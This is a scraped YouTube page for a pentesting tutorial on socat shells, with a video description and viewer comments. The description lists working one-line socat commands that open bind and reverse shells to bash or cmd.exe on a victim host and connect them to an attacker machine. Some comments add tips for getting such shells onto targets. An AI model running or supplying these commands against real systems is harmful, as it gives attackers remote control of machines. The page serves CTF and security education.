No video
How To Get A FULLY Interactive Reverse Shell in Linux OR Windows
Рет қаралды 29,810
3 жыл бұрынNetcat is an amazing tool and is so useful and versatile for penetration tests and even other IT administration tasks. However, it is very limited, especially with Penetration Testing.
A Reverse Shell with Socat will give you a much higher degree of interactivity, even allowing you functionality to edit files in the command line, just like a SSH session.
Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Attacker: socat - TCP4:192.168.1.1:4443
Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT
Encrypted Bind / Reverse Shells
Read this article: erev0s.com/blog/encrypted-bin...
Links:
__________________________________________
Twitter: / json_sec
Buy me a coffee: PayPal.Me/jsonsec
===== About JSON : Sec =====
JSON Sec is a Cyber Security KZbin channel, bringing you a range of videos from technical tutorials, security tips and documentaries . The goal is to help everybody through all technical levels to improve the security of their digital life.
Please consider subscribing if you enjoyed this video!
@saurabhkumar1976 3 жыл бұрын
Thanks for this 😊
@MartinGaertner 11 ай бұрын
Very great video, thank you very much!
@joeljohnson5576 2 жыл бұрын
great stuff mann, Thanks
@Hartley94 3 жыл бұрын
Thank you.
@BrianPrisbe 2 жыл бұрын
Awesome
@SpamSandra-lh3nq 7 ай бұрын
great!!!
@mercury1803 3 жыл бұрын
have you tried spawning a tty while using nc, you can also use the stty trick to make sure `Ctrl + C` doesn't kill the process
@mercury1803 3 жыл бұрын
I can demonstrate this in TryHackMe's discord if you want, KZbin comments are slightly clunky...
@JSONSEC 3 жыл бұрын
As I said in the video, I've tried a lot of things like fully interactive tty shell, adding key shortcuts etc. But nothing has worked so effortlessly and so smoothly as this
@MarsTheProgrammer 2 жыл бұрын
The biggest selling point is that you can encrypt the connection with socat.
@Carinala8257 2 жыл бұрын
I run socat on a windows machine in a cmd with admin rights. but unfortunately i only have user rights in the remote shell after a successful connection. Does anyone have a solution for this ?
@_hawk_8681 Жыл бұрын
Get the sudo password of the remote Linux machine, once u have it. Connect to it and then 'sudo su', it will ask for password, enter the password and ur now admin...
@marounahel8205 Жыл бұрын
i really liked your video
@JSONSEC Жыл бұрын
I really liked your comment
@chileaus 2 жыл бұрын
Is there away to reverse shell over the internet?
@_hawk_8681 Жыл бұрын
Well, if u wanna do it on WAN, then make sure to look on to port forwarding stuffs and ssh. You can probably use port forwarding with metasploit to do hacking on the internet.
@skyone9237 3 жыл бұрын
Gr8. ❤️❤️
@unam456 Жыл бұрын
The Windows 11 isolation core and memory integrity protect against this type of attacks? And if i got filtrated ports, router with firewall, nat, antivirus and PC firewall?
@JSONSEC Жыл бұрын
Oh gosh, that's way more than I anticipated for this video. I suppose the scope was more for CTFs
@unam456 Жыл бұрын
@@JSONSEC but u maybe know if that things protect me against this type of attacks, am worried because a person was tryin to hack me
@itsme7570 Жыл бұрын
Thank you!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!🎉🎉🎉🎉🎉🎉🎉🎉🎉
@Urbancorax2 2 жыл бұрын
thank you for that. Now, show everybody how to socat using ssl, transfer files and something else interesting:)
@Mike-cp1tj 4 ай бұрын
but don't you need the target to have socat to be installed? on Windows target isnt this super unlikely
@JSONSEC 4 ай бұрын
Pretty common on Linux, windows you can drop a poweshell one liner
@vikhyatverma4016 2 жыл бұрын
It'd be great if i could do that on windows...
@randomstatements8034 2 жыл бұрын
How would this work in windows
@JSONSEC Жыл бұрын
Simply drop the socat.exe file across and use the same commands :)
@Nexxal Жыл бұрын
@@JSONSEC what exe file
@papahorse3347 2 жыл бұрын
ty so much,can you start doing some try to hack me walkthrough videos? your explaining realy good and it would be nice to learn from you more
@JSONSEC 2 жыл бұрын
I plan on building my own machines and do walkthroughs. I think there are plenty of other great guys that explain things just as well / if not better than me :)
@BellatrixLugosi 2 жыл бұрын
The problem is they dont have socat installed, and any compiler
@JSONSEC 2 жыл бұрын
You'd be surprised how common it is
@BellatrixLugosi 2 жыл бұрын
@@JSONSEC i have rooted hundreds of linux and bsd server, and they doesn't have socat installed, the way i get fully tty shell is using mostly python pty module
@iakashx 2 жыл бұрын
Noice. 👍 Just wanna hightlight some things because I ran into them while doing this. socat file:`tty`,raw,echo=0 tcp-listen:4444 This listener didn't work properly when I tried to get reverse shell from target (say php or any kinda exploit / nc rev shell etc.) Initially I thought this has to do something with bash/zsh. But it wasn't. Finally, I got rev shell on nc first. Got socat is present on target. Then I created another shell with socat. ✌✌ Edit: Modified php-rev-shell to directly give me shell on socat. Better now. :)
@bendomino8476 3 жыл бұрын
this is good but not every victim machine will have socat preinstall
@JSONSEC 2 жыл бұрын
You'd be surprised how many do. But if it doesn't you can simply transfer the binary instead of a nc or a msfv shell
2 жыл бұрын
@@JSONSEC how would you do that? is there a script i can install on the "victim" WINDOWS computer and it automatically installs socat and runs the command to connect? i have been trying for hours to setup a listener on a kali linux virtual machine and connect with my windows computer. can you help? thanks
@codermomo1792 Ай бұрын
@@JSONSEC AV will not be happy
@Firoz900 3 жыл бұрын
What? Are you serious?
@jasonford2877 3 жыл бұрын
Sure am. Of course it won't work for EVERY circumstance, but neither does netcat
@Firoz900 3 жыл бұрын
@@jasonford2877 Guru is always right!
@JSONSEC 3 жыл бұрын
Certainly not! Being wrong gives you a chance to learn! :)
Null Byte
Рет қаралды 311 М.